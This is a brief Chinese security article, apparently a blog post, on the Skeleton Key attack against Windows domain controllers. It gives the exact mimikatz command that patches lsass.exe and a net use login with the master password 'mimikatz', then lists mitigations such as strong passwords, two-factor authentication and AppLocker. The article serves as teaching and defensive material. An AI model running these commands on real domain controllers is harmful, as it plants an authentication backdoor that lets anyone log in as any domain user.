前提需要拿到域控获取域管权限

Windows2003—Windows 2012 R2 x64 域控制器

mimikatz.exe "privilege::debug" "misc::skeleton" exit

net use \\OWA2010SP3\ipc$ "mimikatz" /user:0day.org\administrator

•域管理员用户要设置强口令，确保恶意代码不会在域控制器中执行。•在所有域用户中启用双因子认证，例如智能卡认证。• 启动应用程序白名单（例如 AppLocker)，以限制 mimikatz 在域控制器中的运行。在日常网络维护中注意以下方面，也可以有效防范 Skeleton Key。• 向域控制器注人 Skeleton Key 的方法，只能在 64位操作系统中使用，包括 Windows Server 2012 R2, Windows Server 2012. Windows Server 2008, Windows Server 2008 R2, Windows Server 2003 R2. Windows Server 2003 •只有具有域管理员权限的用户可以将 Skeleton Key 注人域控制器的 1sass.exe 进程。•Skeleton Key 被注人后，用广使用现有的密码仍然可以登录系统。•因为 Skeleton Key 是被注人 lsass.exe 进程的，所以它只存在于内存中。如果域控制器重启，注人的 Skeleton Key 将会失效。

欢 迎 加 入 星 球 ！

 还在等什么？赶紧点击下方名片关注学习吧！

推荐阅读

群聊 | 技术交流群-群除我佬

干货｜史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制